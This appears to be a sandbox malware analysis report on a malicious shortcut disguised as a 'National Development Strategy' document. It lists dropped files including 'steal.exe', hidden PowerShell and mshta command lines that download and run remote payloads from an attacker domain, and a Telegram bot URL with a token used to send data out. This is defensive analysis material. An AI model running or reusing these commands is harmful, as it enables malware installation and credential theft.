Files
File Path
|
Type
|
Category
|
Malicious
|
|
---|---|---|---|---|
National Development Strategy.lnk
|
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has command line arguments, Icon
number=0, Archive, ctime=Sat Dec 7 08:09:39 2019, mtime=Thu Dec 22 03:43:01 2022, atime=Sat Dec 7 08:09:39 2019, length=14848,
window=hide
|
initial sample
|
||
C:\ProgramData\lsacs.exe
|
PE32+ executable (GUI) x86-64, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\Cryptodome\Cipher\_Salsa20.pyd
|
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\Cryptodome\Cipher\_raw_aes.pyd
|
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\Cryptodome\Cipher\_raw_aesni.pyd
|
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\Cryptodome\Cipher\_raw_cbc.pyd
|
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\Cryptodome\Cipher\_raw_cfb.pyd
|
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\Cryptodome\Cipher\_raw_ctr.pyd
|
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\Cryptodome\Cipher\_raw_ecb.pyd
|
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\Cryptodome\Cipher\_raw_eksblowfish.pyd
|
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\Cryptodome\Cipher\_raw_ocb.pyd
|
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\Cryptodome\Cipher\_raw_ofb.pyd
|
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\Cryptodome\Hash\_BLAKE2s.pyd
|
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\Cryptodome\Hash\_MD5.pyd
|
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\Cryptodome\Hash\_SHA1.pyd
|
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\Cryptodome\Hash\_SHA256.pyd
|
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\Cryptodome\Hash\_ghash_clmul.pyd
|
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\Cryptodome\Hash\_ghash_portable.pyd
|
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\Cryptodome\Protocol\_scrypt.pyd
|
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\Cryptodome\Util\_cpuid_c.pyd
|
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\Cryptodome\Util\_strxor.pyd
|
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\_bz2.pyd
|
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\_ctypes.pyd
|
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\_decimal.pyd
|
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\_elementtree.pyd
|
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\_hashlib.pyd
|
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\_lzma.pyd
|
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\_queue.pyd
|
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\_socket.pyd
|
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\_sqlite3.pyd
|
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\_ssl.pyd
|
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\_uuid.pyd
|
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\pyexpat.pyd
|
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\python39.dll
|
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\pythoncom39.dll
|
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\pywintypes39.dll
|
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\select.pyd
|
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\sqlite3.dll
|
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\steal.exe
|
PE32+ executable (GUI) x86-64, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\unicodedata.pyd
|
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\win32crypt.pyd
|
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
|
dropped
|
||
C:\ProgramData\file.pdf
|
PDF document, version 1.7, 1 pages
|
dropped
|
||
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\05349744be1ad4ad_0
|
data
|
dropped
|
||
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\0786087c3c360803_0
|
data
|
dropped
|
||
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\0998db3a32ab3f41_0
|
data
|
dropped
|
||
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\0ace9ee3d914a5c0_0
|
data
|
dropped
|
||
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\0f25049d69125b1e_0
|
data
|
dropped
|
||
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\230e5fe3e6f82b2c_0
|
data
|
dropped
|
||
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\2798067b152b83c7_0
|
data
|
dropped
|
||
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\2a426f11fd8ebe18_0
|
data
|
dropped
|
||
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\39c14c1f4b086971_0
|
data
|
dropped
|
||
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\3a4ae3940784292a_0
|
data
|
dropped
|
||
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\4a0e94571d979b3c_0
|
data
|
dropped
|
||
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\560e9c8bff5008d8_0
|
data
|
dropped
|
||
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\56c4cd218555ae2b_0
|
data
|
dropped
|
||
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\6267ed4d4a13f54b_0
|
data
|
dropped
|
||
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\6fb6d030c4ebbc21_0
|
data
|
dropped
|
||
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\7120c35b509b0fae_0
|
data
|
modified
|
||
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\71febec55d5c75cd_0
|
data
|
dropped
|
||
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\86b8040b7132b608_0
|
data
|
dropped
|
||
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\8c159cc5880890bc_0
|
data
|
dropped
|
||
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\8c84d92a9dbce3e0_0
|
data
|
dropped
|
||
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\8e417e79df3bf0e9_0
|
data
|
dropped
|
||
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\91cec06bb2836fa5_0
|
data
|
dropped
|
||
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\927a1596c37ebe5e_0
|
data
|
dropped
|
||
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\92c56fa2a6c4d5ba_0
|
data
|
dropped
|
||
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\946896ee27df7947_0
|
data
|
dropped
|
||
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\983b7a3da8f39a46_0
|
data
|
dropped
|
||
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\aba6710fde0876af_0
|
data
|
dropped
|
||
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\b6d5deb4812ac6e9_0
|
data
|
dropped
|
||
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\bba29d2e6197e2f4_0
|
data
|
dropped
|
||
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\bf0ac66ae1eb4a7f_0
|
data
|
dropped
|
||
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\cf3e34002cde7e9c_0
|
data
|
dropped
|
||
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\d449e58cb15daaf1_0
|
data
|
dropped
|
||
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\d88192ac53852604_0
|
data
|
dropped
|
||
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\de789e80edd740d6_0
|
data
|
dropped
|
||
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\f0cf6dfa8a1afa3d_0
|
data
|
dropped
|
||
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\f4a0d4ca2f3b95da_0
|
data
|
dropped
|
||
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\f941376b2efdd6e6_0
|
data
|
dropped
|
||
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\f971b7eda7fa05c3_0
|
data
|
dropped
|
||
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\fd17b2d8331c91e8_0
|
data
|
dropped
|
||
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\fdd733564de6fbcb_0
|
data
|
dropped
|
||
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\febb41df4ea2b63a_0
|
data
|
dropped
|
||
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\index-dir\temp-index
|
data
|
dropped
|
||
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\index-dir\the-real-index (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\index-dir\the-real-index~RF67bdbd.TMP (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG
|
ASCII text
|
dropped
|
||
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG.old (copy)
|
ASCII text
|
dropped
|
||
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG.old~RF671596.TMP (copy)
|
ASCII text
|
dropped
|
||
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Visited Links
|
data
|
dropped
|
||
C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ConnectorIcons\icon-230131015135Z-242.bmp
|
PC bitmap, Windows 3.x format, 107 x -152 x 32, cbSize 65110, bits offset 54
|
dropped
|
||
C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages
|
SQLite 3.x database, last written using SQLite version 3024000, file counter 12, database pages 15, cookie 0x5, schema 4,
UTF-8, version-valid-for 12
|
dropped
|
||
C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages-journal
|
SQLite Rollback Journal
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\189397[1].png
|
PNG image data, 512 x 512, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\s[1].hta
|
HTML document, ASCII text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_a3vxi3je.uda.ps1
|
very short file (no magic)
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cjchyufc.z4k.psm1
|
very short file (no magic)
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dapxgbjs.b5j.ps1
|
very short file (no magic)
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jvlelz22.etj.psm1
|
very short file (no magic)
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pbjyotax.xfw.psm1
|
very short file (no magic)
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_slrsabnf.e3p.ps1
|
very short file (no magic)
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\certifi\cacert.pem
|
ASCII text
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\libcrypto-1_1.dll
|
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\libffi-7.dll
|
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\libssl-1_1.dll
|
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\vcruntime140.dll
|
PE32+ executable (DLL) (console) x86-64, for MS Windows
|
dropped
|
||
C:\Users\user\Desktop\Loginvault.db
|
SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 2, database pages 23, cookie
0x19, schema 4, UTF-8, version-valid-for 2
|
dropped
|
There are 99 hidden files, click here to show them.
Processes
Path
|
Cmdline
|
Malicious
|
|
---|---|---|---|
C:\Windows\System32\mshta.exe
|
"C:\Windows\System32\mshta.exe" https://cloud.archive-downloader.com/s.hta
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden -command Invoke-WebRequest -URI https://cloud.archive-downloader.com/file.pdf
-OutFile 'c:\programdata\file.pdf'; c:\programdata\file.pdf
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden -command Invoke-WebRequest -URI https://cloud.archive-downloader.com/lsacs.exe
-OutFile 'c:\programdata\lsacs.exe'; c:\programdata\lsacs.exe
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command Remove-Item C:\Users\user\Downloads\Presidents_Strategy_2023.rar
|
||
C:\ProgramData\lsacs.exe
|
C:\programdata\lsacs.exe
|
||
C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\steal.exe
|
C:\programdata\lsacs.exe
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
|
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\programdata\file.pdf
|
||
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
|
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
|
There are 1 hidden processes, click here to show them.
URLs
Name
|
IP
|
Malicious
|
|
---|---|---|---|
https://cloud.archive-downloader.com/P
|
unknown
|
||
https://cloud.archive-downloader.com/L
|
unknown
|
||
https://cloud.archive-downloader.com/lsacs.exe
|
193.149.129.50
|
||
http://cloud.archive-downloader.com
|
unknown
|
||
https://cloud.archive-downloader.com/s.htaATH=
|
unknown
|
||
https://cloud.archive-downloader.com/s.hta...6
|
unknown
|
||
https://cloud.archive-downloader.comx
|
unknown
|
||
https://cloud.archive-downloader.com/s.htaLMEMX8U
|
unknown
|
||
https://cloud.archive-downloader.com/s.htaNNC:
|
unknown
|
||
https://cloud.archive-downloader.com/s.htaowsINetCookies
|
unknown
|
||
https://cloud.archive-downloader.com/s.htaC:
|
unknown
|
||
https://cloud.archive-downloader.com/s.hta...
|
unknown
|
||
https://cloud.archive-downloader.com
|
unknown
|
||
https://cloud.archive-downloader.com/s.hta=
|
unknown
|
||
https://cloud.archive-downloader.com/s.hta
|
193.149.129.50
|
||
https://cloud.archive-downloader.com/file.pdf0y
|
unknown
|
||
https://cloud.archive-downloader.com/lsacs.exeG
|
unknown
|
||
https://cloud.archive-downloader.com/s.hta)
|
unknown
|
||
https://cloud.archive-downloader.com/lsacs.exe0y
|
unknown
|
||
https://cloud.archive-downloader.com/
|
unknown
|
||
https://cloud.archive-downloader.com/lsacs.exe-OutFile
|
unknown
|
||
https://cloud.archive-downloader.com/file.pdf
|
193.149.129.50
|
||
https://cloud.archive-downloader.com/s.htaQ
|
unknown
|
||
https://cloud.archive-downloader.com/file.pdf-OutFile
|
unknown
|
||
http://google.com/
|
unknown
|
||
https://mahler:8092/site-updates.py
|
unknown
|
||
http://tools.ietf.org/html/rfc5869
|
unknown
|
||
https://cdn1.iconfinder.com/data/icons/google_jfk_icons_by_carlosjj/512/chrome.pngl
|
unknown
|
||
https://cloud.google.com/appengine/docs/standard/runtimes
|
unknown
|
||
http://blog.cryptographyengineering.com/2012/05/how-to-choose-authenticated-encryption.html
|
unknown
|
||
http://www.python.org/
|
unknown
|
||
https://github.com/mhammond/pywin32
|
unknown
|
||
https://httpbin.org/post
|
unknown
|
||
https://contoso.com/License
|
unknown
|
||
https://cdn1.iconfinder.com/data/icons/google_jfk_icons_by_carlosjj/512/chrome.pngr
|
unknown
|
||
https://github.com/Ousret/charset_normalizer
|
unknown
|
||
https://api.telegram.org/bot5885840251:AAG8HoCjrI1QANXkA4oqnJ60lgPP7w86Clg/sendMessage?chat_id=56833
|
unknown
|
||
https://tools.ietf.org/html/rfc2388#section-4.4
|
unknown
|
||
http://yahoo.com/
|
unknown
|
||
http://www.iana.org/assignments/tls-parameters/tls-parameters.xml#tls-parameters-6
|
unknown
|
||
https://www.ibm.com/
|
unknown
|
||
https://contoso.com/
|
unknown
|
||
https://nuget.org/nuget.exe
|
unknown
|
||
https://cdn1.iconfinder.com/data/icons/google_jfk_icons_by_carlosjj/512/chrome.pngC:
|
unknown
|
||
http://www.iana.org/time-zones/repository/tz-link.html
|
unknown
|
||
http://tools.ietf.org/html/rfc5297
|
unknown
|
||
https://urllib3.readthedocs.io/en/1.26.x/advanced-usage.html#ssl-warningsp
|
unknown
|
||
https://requests.readthedocs.io
|
unknown
|
||
https://tools.ietf.org/html/rfc3610
|
unknown
|
||
http://speleotrove.com/decimal/decarith.html
|
unknown
|
||
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
https://cdn1.iconfinder.com/;
|
unknown
|
||
http://json.org
|
unknown
|
||
https://cdn1.iconfinder.com/data/icons/google_jfk_icons_by_carlosjj/512/chrome.png
|
172.64.193.26
|
||
http://www.cs.ucdavis.edu/~rogaway/papers/keywrap.pdf
|
unknown
|
||
https://httpbin.org/get
|
unknown
|
||
http://nuget.org/NuGet.exe
|
unknown
|
||
http://httpbin.org/
|
unknown
|
||
https://www.python.org
|
unknown
|
||
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
https://cdn1.iconfinder.com/I
|
unknown
|
||
http://www.tarsnap.com/scrypt/scrypt-slides.pdf
|
unknown
|
||
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
http://csrc.nist.gov/publications/nistpubs/800-38a/sp800-38a.pdf
|
unknown
|
||
https://go.micro
|
unknown
|
||
https://contoso.com/Icon
|
unknown
|
||
https://urllib3.readthedocs.io/en/1.26.x/advanced-usage.html#ssl-warnings
|
unknown
|
||
https://httpbin.org/
|
unknown
|
||
http://www.cl.cam.ac.uk/~mgk25/iso-time.html
|
unknown
|
||
https://twitter.com/
|
unknown
|
||
https://github.com/Pester/Pester
|
unknown
|
||
http://hg.python.org/cpython/file/603b4d593758/Lib/socket.py#l535
|
unknown
|
||
https://www.ibm.com/support/knowledgecenter/en/ssw_aix_61/com.ibm.aix.basetrf1/load.htm
|
unknown
|
||
http://crl.m
|
unknown
|
||
http://google.com/mail/
|
unknown
|
||
http://wwwsearch.sf.net/):
|
unknown
|
||
https://tools.ietf.org/html/rfc5297
|
unknown
|
||
https://www.ietf.org/rfc/rfc2898.txt
|
unknown
|
||
http://web.cs.ucdavis.edu/~rogaway/ocb/license.htm
|
unknown
|
||
https://packaging.python.org/specifications/entry-points/
|
unknown
|
||
https://cdn1.iconfinder.com/y
|
unknown
|
||
http://www.phys.uu.nl/~vgent/calendar/isocalendar.htm
|
unknown
|
||
http://www.rfc-editor.org/info/rfc7253
|
unknown
|
||
https://cdn1.iconfinder.com/
|
unknown
|
||
http://csrc.nist.gov/publications/nistpubs/800-38C/SP800-38C.pdf
|
unknown
|
||
http://google.com/mail
|
unknown
|
||
http://csrc.nist.gov/publications/nistpubs/800-38D/SP-800-38D.pdf
|
unknown
|
There are 77 hidden URLs, click here to show them.
Domains
Name
|
IP
|
Malicious
|
|
---|---|---|---|
cloud.archive-downloader.com
|
193.149.129.50
|
||
cdn1.iconfinder.com
|
172.64.193.26
|
IPs
IP
|
Domain
|
Country
|
Malicious
|
|
---|---|---|---|---|
193.149.129.50
|
cloud.archive-downloader.com
|
Denmark
|
||
192.168.2.1
|
unknown
|
unknown
|
||
172.64.193.26
|
cdn1.iconfinder.com
|
United States
|
Registry
Path
|
Value
|
Malicious
|
|
---|---|---|---|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
||
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
LangID
|
||
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe.FriendlyAppName
|
||
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe.ApplicationCompany
|
||
HKEY_CURRENT_USER\Software\Adobe\Acrobat Reader\DC\AVGeneral\cRecentFiles\c1
|
aFS
|
||
HKEY_CURRENT_USER\Software\Adobe\Acrobat Reader\DC\AVGeneral\cRecentFiles\c1
|
tDIText
|
||
HKEY_CURRENT_USER\Software\Adobe\Acrobat Reader\DC\AVGeneral\cRecentFiles\c1
|
tFileName
|
||
HKEY_CURRENT_USER\Software\Adobe\Acrobat Reader\DC\AVGeneral\cRecentFiles\c1
|
tFileSource
|
||
HKEY_CURRENT_USER\Software\Adobe\Acrobat Reader\DC\AVGeneral\cRecentFiles\c1
|
sFileAncestors
|
||
HKEY_CURRENT_USER\Software\Adobe\Acrobat Reader\DC\AVGeneral\cRecentFiles\c1
|
sDI
|
||
HKEY_CURRENT_USER\Software\Adobe\Acrobat Reader\DC\AVGeneral\cRecentFiles\c1
|
sDate
|
||
HKEY_CURRENT_USER\Software\Adobe\Acrobat Reader\DC\AVGeneral\cRecentFiles\c1
|
uFileSize
|
||
HKEY_CURRENT_USER\Software\Adobe\Acrobat Reader\DC\AVGeneral\cRecentFiles\c1
|
uPageCount
|
||
HKEY_CURRENT_USER\Software\Adobe\Acrobat Reader\DC\AVGeneral\cRecentFiles\c2
|
aFS
|
||
HKEY_CURRENT_USER\Software\Adobe\Acrobat Reader\DC\AVGeneral\cRecentFiles\c2
|
tDIText
|
||
